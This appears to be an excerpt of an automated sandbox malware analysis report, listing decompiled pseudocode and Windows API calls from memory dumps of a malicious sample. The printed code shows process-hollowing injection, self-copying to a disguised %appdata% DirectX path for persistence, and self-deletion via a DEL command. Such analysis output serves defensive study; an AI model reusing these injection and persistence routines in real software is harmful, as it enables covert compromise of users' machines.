      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 83%
    			E0040BC54(void* __edx) {
    				void* _t6;
    				void* _t13;
    				void* _t17;
    				void* _t20;
    				void* _t21;
    				void* _t22;
    
    				_t17 = __edx;
    				if(__edx != 0) {
    					_t22 = _t22 + 0xfffffff0;
    					_t6 = E00403404(_t6, _t21);
    				}
    				_t20 = _t6;
    				E004030E4(0);
    				 *((intOrPtr*)(_t20 + 0xc)) = 0xffff;
    				 *((intOrPtr*)(_t20 + 0x10)) = CreateEventA(0, 0xffffffff, 0xffffffff, 0);
    				 *((intOrPtr*)(_t20 + 0x14)) = CreateEventA(0, 0, 0, 0);
    				 *(_t20 + 0x18) = 0xffffffff;
    				 *((intOrPtr*)(_t20 + 0x20)) = E004030E4(1);
    				_t13 = _t20;
    				if(_t17 != 0) {
    					E0040345C(_t13);
    					_pop( *[fs:0x0]);
    				}
    				return _t20;
    			}

    APIs
    • CreateEventA.KERNEL32(00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC7E
    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC8E
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E004179B4(void* __eax) {
    				void* _t3;
    
    				L0040C518();
    				if(__eax != 0) {
    					_t3 = E0040A56C("WSACleanup", 1);
    					E0040386C();
    					return _t3;
    				}
    				return __eax;
    			}

    APIs
    • WSACleanup.WSOCK32(00417A06,00000000,00417A14), ref: 004179B4
    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 78%
    			E0040F0A8(signed int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
    				void* _v8;
    				char _v264;
    				char _v520;
    				char _v524;
    				signed char _t47;
    				intOrPtr* _t59;
    				intOrPtr _t61;
    				intOrPtr* _t75;
    				void* _t78;
    
    				_v524 = 0;
    				_t75 = __edx;
    				_t47 = __eax;
    				_push(_t78);
    				_push(0x40f1ce);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t78 + 0xfffffdf8;
    				_t73 = __eax & 0x00000fff;
    				if((__eax & 0x00000fff) > 0x14) {
    					if(__eax != 0x100) {
    						if(__eax != 0x101) {
    							if(E0040F504(__eax,  &_v8) == 0) {
    								E00407110( &_v524, 4);
    								_t59 =  *0x4530ec; // 0x419128
    								E00404194(_t75, _v524,  *_t59);
    							} else {
    								E00403064( *_v8,  &_v520);
    								E004027B4( &_v520, 0x7fffffff, 2,  &_v264);
    								E004040EC(__edx,  &_v264);
    							}
    						} else {
    							E00403EDC(__edx, 0x40f1f4);
    						}
    					} else {
    						E00403EDC(__edx, "String");
    					}
    				} else {
    					E00403EDC(__edx,  *((intOrPtr*)(0x419358 + (_t73 & 0x0000ffff) * 4)));
    				}
    				if((_t47 & 0x00000020) != 0) {
    					E00404194(_t75,  *_t75, "Array ");
    				}
    				if((_t47 & 0x00000040) != 0) {
    					E00404194(_t75,  *_t75, "ByRef ");
    				}
    				_pop(_t61);
    				 *[fs:eax] = _t61;
    				_push(E0040F1D5);
    				return E00403E88( &_v524);
    			}

    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0041381C(intOrPtr __eax, void* __ebx, char* __edx, void* __edi, void* __esi) {
    				intOrPtr _v8;
    				char _v12;
    				char* _t15;
    				char* _t23;
    				intOrPtr _t30;
    				char _t31;
    				intOrPtr _t39;
    				intOrPtr _t42;
    				void* _t45;
    
    				_v12 = 0;
    				_t23 = __edx;
    				_push(_t45);
    				_push(0x4138c2);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t45 + 0xfffffff8;
    				_v8 = 0;
    				if(__edx != 0) {
    					_t39 = __eax;
    					while( *_t23 != 0) {
    						_t15 = _t23;
    						while(1) {
    							_t31 =  *_t23;
    							if(_t31 == 0 || _t31 + 0xd3 - 2 < 0) {
    								break;
    							}
    							_t23 = _t23 + 1;
    						}
    						E00403F78( &_v12, _t23 - _t15, _t15);
    						_t42 = E004165D4(_t39, _t23 - _t15, _v12);
    						if(_t42 == 0 && E00406E50(_v12, 0x4138dc) != 0) {
    							_t42 = _t39;
    						}
    						if(_t42 != 0) {
    							if( *_t23 == 0x2e) {
    								_t23 = _t23 + 1;
    							}
    							if( *_t23 == 0x2d) {
    								_t23 = _t23 + 1;
    							}
    							if( *_t23 == 0x3e) {
    								_t23 = _t23 + 1;
    							}
    							_t39 = _t42;
    							continue;
    						}
    						goto L19;
    					}
    					_v8 = _t39;
    				}
    				L19:
    				_pop(_t30);
    				 *[fs:eax] = _t30;
    				_push(E004138C9);
    				return E00403E88( &_v12);
    			}

    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 96%
    			E0041498C(void* __eax, void* __ecx, void* __edx) {
    				signed int _t7;
    				void* _t8;
    				void* _t17;
    				void* _t29;
    
    				_push(__ecx);
    				_t29 = __edx;
    				_t17 = __eax;
    				_t7 = E004155CC(__ecx) & 0x0000007f;
    				if(_t7 > 0xd) {
    					L7:
    					_t8 = E00413A2C();
    				} else {
    					_t1 = _t7 + E004149B3; // 0x5
    					switch( *((intOrPtr*)( *_t1 * 4 +  &M004149C1))) {
    						case 0:
    							goto L7;
    						case 1:
    							E00413F54(_t17, 1, _t30);
    							E00403F78(_t29,  *_t30, 0);
    							_t8 = E00413F54(_t17,  *_t30, E004043A0(_t29));
    							goto L8;
    						case 2:
    							__eax = __esi;
    							__edx = 0x414a58;
    							__eax = E00403EDC(__esi, 0x414a58);
    							goto L8;
    						case 3:
    							__eax = __esi;
    							__edx = 0x414a68;
    							__eax = E00403EDC(__esi, 0x414a68);
    							goto L8;
    						case 4:
    							__eax = __esi;
    							__edx = 0x414a78;
    							__eax = E00403EDC(__esi, 0x414a78);
    							goto L8;
    						case 5:
    							__eax = __esi;
    							__edx = 0x414a84;
    							__eax = E00403EDC(__esi, 0x414a84);
    							goto L8;
    					}
    				}
    				L8:
    				return _t8;
    			}

    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040AC28() {
    				intOrPtr* _t5;
    				intOrPtr* _t6;
    				intOrPtr* _t7;
    				intOrPtr* _t8;
    				intOrPtr* _t9;
    				intOrPtr _t12;
    				intOrPtr _t13;
    				intOrPtr _t16;
    				intOrPtr* _t17;
    				intOrPtr* _t18;
    
    				_t12 =  *0x452f70; // 0x405e70
    				 *0x45478c = E0040A628(_t12, 1);
    				_t13 =  *0x453040; // 0x405ef0
    				 *0x454790 = E0040A628(_t13, 1);
    				_t5 =  *0x452f34; // 0x454008
    				 *_t5 = 0x40a7a4;
    				_t6 =  *0x452fa8; // 0x454004
    				 *_t6 = E0040AC18;
    				_t7 =  *0x452f64; // 0x45401c
    				_t16 =  *0x406188; // 0x4061d4
    				 *_t7 = _t16;
    				_t8 =  *0x452f98; // 0x45400c
    				 *_t8 = E0040A968;
    				_t9 =  *0x452fac; // 0x454010
    				 *_t9 = E0040AB4C;
    				_t17 =  *0x453054; // 0x454020
    				 *_t17 = E0040A8B4;
    				_t18 =  *0x452f24; // 0x454028
    				 *_t18 = E0040A8D0;
    				return E0040A8D0;
    			}

    Strings
    Memory Dump Source
    • Source File: 00000010.00000002.1534525531.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_16_2_400000_obtG43AWHP.jbxd

    Executed Functions

    APIs
    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0037E0C6
    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0037E0DC
    • CreateProcessA.KERNEL32(?,00000000), ref: 0037E1C2
    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0037E1F0
    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0037E235
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 0037E271
    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0037E297
    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 0037E306
    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0037E32C
    • SetThreadContext.KERNEL32(00000000,?), ref: 0037E34E
    • ResumeThread.KERNELBASE(00000000), ref: 0037E35A
    Memory Dump Source
    • Source File: 00000011.00000002.1543232621.0037D000.00000040.sdmp, Offset: 0037D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_17_2_37d000_obtG43AWHP.jbxd
    APIs
    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0037E493
    • PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0037E4B6
      • Part of subcall function 0037E080: VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0037E0C6
      • Part of subcall function 0037E080: GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0037E0DC
      • Part of subcall function 0037E080: CreateProcessA.KERNEL32(?,00000000), ref: 0037E1C2
      • Part of subcall function 0037E080: VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0037E1F0
    Strings
    Memory Dump Source
    • Source File: 00000011.00000002.1543232621.0037D000.00000040.sdmp, Offset: 0037D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_17_2_37d000_obtG43AWHP.jbxd
    APIs
    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 0037E54C
      • Part of subcall function 0037E380: CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0037E493
      • Part of subcall function 0037E380: PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0037E4B6
    Strings
    Memory Dump Source
    • Source File: 00000011.00000002.1543232621.0037D000.00000040.sdmp, Offset: 0037D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_17_2_37d000_obtG43AWHP.jbxd

    Non-executed Functions

    Memory Dump Source
    • Source File: 00000011.00000002.1543232621.0037D000.00000040.sdmp, Offset: 0037D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_17_2_37d000_obtG43AWHP.jbxd

    Executed Functions

    C-Code - Quality: 65%
    			E00404FC0(intOrPtr __eax) {
    				intOrPtr _v8;
    				void* _v12;
    				char _v15;
    				char _v17;
    				char _v18;
    				char _v22;
    				int _v28;
    				char _v289;
    				long _t44;
    				long _t61;
    				long _t63;
    				CHAR* _t70;
    				CHAR* _t72;
    				struct HINSTANCE__* _t78;
    				struct HINSTANCE__* _t84;
    				char* _t94;
    				void* _t95;
    				intOrPtr _t99;
    				struct HINSTANCE__* _t107;
    				void* _t110;
    				void* _t112;
    				intOrPtr _t113;
    
    				_t110 = _t112;
    				_t113 = _t112 + 0xfffffee0;
    				_v8 = __eax;
    				GetModuleFileNameA(0,  &_v289, 0x105);
    				_v22 = 0;
    				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
    				if(_t44 == 0) {
    					L3:
    					_push(_t110);
    					_push(0x4050c5);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t113;
    					_v28 = 5;
    					E00404E08( &_v289, 0x105);
    					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040522C, 0, 0,  &_v22,  &_v28) != 0) {
    						_v22 = 0;
    					}
    					_v18 = 0;
    					_pop(_t99);
    					 *[fs:eax] = _t99;
    					_push(E004050CC);
    					return RegCloseKey(_v12);
    				} else {
    					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
    					if(_t61 == 0) {
    						goto L3;
    					} else {
    						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
    						if(_t63 != 0) {
    							_push(0x105);
    							_push(_v8);
    							_push( &_v289);
    							L00401248();
    							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
    							_t107 = 0;
    							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
    								_t70 =  &_v289;
    								_push(_t70);
    								L00401250();
    								_t94 = _t70 +  &_v289;
    								while( *_t94 != 0x2e && _t94 !=  &_v289) {
    									_t94 = _t94 - 1;
    								}
    								_t72 =  &_v289;
    								if(_t94 != _t72) {
    									_t95 = _t94 + 1;
    									if(_v22 != 0) {
    										_push(0x105 - _t95 - _t72);
    										_push( &_v22);
    										_push(_t95);
    										L00401248();
    										_t107 = LoadLibraryExA( &_v289, 0, 2);
    									}
    									if(_t107 == 0 && _v17 != 0) {
    										_push(0x105 - _t95 -  &_v289);
    										_push( &_v17);
    										_push(_t95);
    										L00401248();
    										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
    										_t107 = _t78;
    										if(_t107 == 0) {
    											_v15 = 0;
    											_push(0x105 - _t95 -  &_v289);
    											_push( &_v17);
    											_push(_t95);
    											L00401248();
    											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
    											_t107 = _t84;
    										}
    									}
    								}
    							}
    							return _t107;
    						} else {
    							goto L3;
    						}
    					}
    				}
    			}

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404E08: GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
      • Part of subcall function 00404E08: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
      • Part of subcall function 00404E08: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
      • Part of subcall function 00404E08: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
    • RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
    • RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 61%
    			E004050CC() {
    				void* _t28;
    				void* _t30;
    				struct HINSTANCE__* _t36;
    				struct HINSTANCE__* _t42;
    				char* _t51;
    				void* _t52;
    				struct HINSTANCE__* _t59;
    				void* _t61;
    
    				_push(0x105);
    				_push( *((intOrPtr*)(_t61 - 4)));
    				_push(_t61 - 0x11d);
    				L00401248();
    				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
    				_t59 = 0;
    				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
    					L14:
    					return _t59;
    				} else {
    					_t28 = _t61 - 0x11d;
    					_push(_t28);
    					L00401250();
    					_t51 = _t28 + _t61 - 0x11d;
    					L5:
    					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
    						_t51 = _t51 - 1;
    						goto L5;
    					}
    					_t30 = _t61 - 0x11d;
    					if(_t51 != _t30) {
    						_t52 = _t51 + 1;
    						if( *((char*)(_t61 - 0x12)) != 0) {
    							_push(0x105 - _t52 - _t30);
    							_push(_t61 - 0x12);
    							_push(_t52);
    							L00401248();
    							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
    						}
    						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
    							_push(0x105 - _t52 - _t61 - 0x11d);
    							_push(_t61 - 0xd);
    							_push(_t52);
    							L00401248();
    							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
    							_t59 = _t36;
    							if(_t59 == 0) {
    								 *((char*)(_t61 - 0xb)) = 0;
    								_push(0x105 - _t52 - _t61 - 0x11d);
    								_push(_t61 - 0xd);
    								_push(_t52);
    								L00401248();
    								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
    								_t59 = _t42;
    							}
    						}
    					}
    					goto L14;
    				}
    			}












    APIs
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 33%
    			E00418750(void* __ebx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				intOrPtr _v48;
    				char _v52;
    				int _v56;
    				char _v60;
    				char _v64;
    				char _v68;
    				char _v72;
    				char* _t52;
    				void* _t80;
    				char* _t87;
    				char* _t99;
    				void* _t109;
    				void* _t110;
    				intOrPtr _t116;
    				intOrPtr _t117;
    				void* _t125;
    				intOrPtr _t139;
    				intOrPtr _t140;
    
    				_t137 = __esi;
    				_t136 = __edi;
    				_t139 = _t140;
    				_t110 = 8;
    				do {
    					_push(0);
    					_push(0);
    					_t110 = _t110 - 1;
    				} while (_t110 != 0);
    				_push(_t110);
    				_push(__ebx);
    				_push(__esi);
    				_push(__edi);
    				_push(_t139);
    				_push(0x418974);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t140;
    				if(E00402944(__ebx, __esi) == 0) {
    					E004029A4(0,  &_v12);
    					ShellExecuteA(0, 0, E00404348(_v12), 0x418984, 0, 0);
    					E00403D1C();
    				}
    				_push(_t139);
    				_push(0x418925);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t140;
    				E004029A4(1,  &_v16);
    				_t109 = E00407138(_v16, 0);
    				_t144 = _t109 - 0x10;
    				if(_t109 == 0x10) {
    					E00417D84("%appdata%\\Microsoft\\DirectX\\nthost.exe", _t109, _t110,  &_v8, _t136, _t137, _t144);
    					E004186D0(_v8, _t109, _t110, _t144);
    					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v24);
    					E00417D84(_v24, _t109, _t110,  &_v20, _t136, _t137, _t144);
    					_push(_v20);
    					E00406EFC("DX9 C++RTL",  &_v28);
    					_pop(_t125);
    					E004185E8(_v28, _t109, _t125);
    					E004029A4(0,  &_v36);
    					E00406EFC(_v36,  &_v32);
    					_push(_v32);
    					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v44);
    					E00417D84(_v44, _t109, _t110,  &_v40, _t136, _t137, 0);
    					_pop(_t80);
    					E00404294(_t80, _v40);
    					if(0 == 0) {
    						__eflags = 1;
    						E00406FFC( &_v60);
    						_t87 = E00404348(_v60);
    						ShellExecuteA(0, 0, E00404348(_v8), _t87, 0, 1);
    					} else {
    						_push(1);
    						_push(0);
    						E00406FFC( &_v52);
    						_push(_v52);
    						_push(" DEL \"");
    						E004029A4(0,  &_v56);
    						E00404208();
    						_t99 = E00404348(_v48);
    						ShellExecuteA(0, 0, E00404348(_v8), _t99, E004189E4, _v56);
    					}
    					E00403D1C();
    				}
    				if(_t109 < 0x20) {
    					E00406FFC( &_v64);
    					_t52 = E00404348(_v64);
    					E004029A4(0,  &_v68);
    					ShellExecuteA(0, 0, E00404348(_v68), _t52, 0, 1); // executed
    					E00403D1C();
    				}
    				_pop(_t116);
    				 *[fs:eax] = _t116;
    				_pop(_t117);
    				 *[fs:eax] = _t117;
    				_push(E0041897B);
    				return E00403EAC( &_v72, 0x11);
    			}
































    APIs
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00403D1C: FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
      • Part of subcall function 00403D1C: ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000,00418925,?,00000000), ref: 00417DAA
